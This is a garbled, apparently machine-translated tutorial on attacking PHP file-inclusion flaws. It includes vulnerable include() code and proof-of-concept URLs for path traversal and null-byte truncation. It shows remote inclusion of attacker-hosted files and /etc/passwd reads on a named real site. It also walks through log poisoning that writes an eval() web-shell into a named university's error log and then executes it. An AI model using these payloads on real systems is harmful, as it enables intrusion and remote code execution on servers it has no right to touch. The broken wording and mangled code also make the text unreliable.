Php includes that.

If you are free, sort out the knowledge you have studied and the knowledge you need to pay attention to. Next year, you may look for work networks.

About LFI in PHP (Local File Include, Local file inclusion) vulnerabilities are very familiar to everyone. There are many paper, especially foreign ones...

Everyone is too lazy to test, so I will sort it out.

1. Common local inclusion;

<?php $query=$_GET['p']; include($query); ?>

Poc:

http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php

../Hanguo/test. phpIs the included path.

As long as the target server supports uploading, whether it is jpg, txt, or gif, it can includeOne-sentence TrojanThis method is very simple and there is nothing to say.

2. truncation local inclusion

Require_once ($ a. '. php'); include ($ a. ". php"); // and so on ..

InWINDOWSIt is particularly useful:

\.Or./Or\Or/Truncation(WINDOWSCan be used .)

Treasure: http://www.bkjia.com/Article/201208/147628.html

Truncation Principle

Linux contains truncation example (Linux./And/Yes .)

% 00Truncation includes, with restrictions on gpc = off and php versions

Poc:

http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php%00

3. Remote inclusion

InAllow_url_include = OnYesRemote File Inclusion,OffOnlyLocal inclusionNow.

Test case:

<?php $query=$_GET['p'];include($query.".php"); ?>

Connection:

http://www.xsser.com/explame.php?p=http://www.axxer.com/yeah.txt

An error occurred:

Warning: main(http://www.axxer.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3

include($query.".php");

For the sake of the Code, add". Php", CauseYeah.txtChangedYeah.txt. php.

Here we don't need to cut it off.360-pay-as-you-go.

Create at www.axxer.comYeah. phpFile;

Then http://www.xsser.com/explame.php? Http://www.axxer.com/p =/YeahAutomatically add

Upper. Php; How loving ....

Remote inclusion of small connections

We can also use the php built-in protocol:

Contains the data: // or php: // input pseudo Protocol

This vulnerability is valid for php5.0 and may fail to be tested in 5.3. It is a good idea.

Http://www.schnelltest24.de/index.php? Page =/etc/passwd // This is not truncated. Let's try to use the Protocol.

ExploitationProtocolThenPOST sending exploitation codeHaha ~~~~.

4. Diary includes advanced exploitation

This connection has already revealed some tips. Let's briefly describe the connection ideas:

(1) access an error connection with a sentence (http://www.ujn.edu.cn/<% 3 fphp eval ($ _ REQUEST [s]); % 3f> xxxxxxxx ...), this connection will be recorded in error. in the log error log file.

(2) locate the vulnerability, includingError. log File Path. Then in the CustomS ParameterEnter our malicious code. (http://www.ujn.edu.cn/english/depart.php? S = phpinfo (); & name = .. /.. /.. /.. /.. /.. /var/log/lighttpd/error. log /. /. /..........)

Restrictions and breakthroughs:

Like http://www.exp.com/index <? Php eval ($ _ POST [cmd]);?>. Php

For such submission, some WEB servers will convert the spaces into HTTP encoding to % 20 to write web logs. If PHP contains <? Php % 20 eval ($ _ POST [cmd]);?> Such a statement will certainly not succeed, so we must write spaces into WEB logs.

You can use: to forge a request packet without the Connection HTTP Header

 

Content 2: http://www.bkjia.com/Article/200810/30017.html

5. Other advanced exploitation

(1) include/proc/self/environ environment variables:

This is based on the environment variables in Linux. In many cases, this method does not work because it does not have the/proc/self/environ access permission. It is the same as reading/etc/passwd.

 

(2) The temporary phpinfo file is cracked and contains. // depending on the situation, some special characters such as % 00 are required.Truncation. As described above.

(3) _ SESSION cracking includes. // depends on the situation, and some require special characters such as % 00Truncation. As described above.

 

Phpinfo brute-force cracking pdf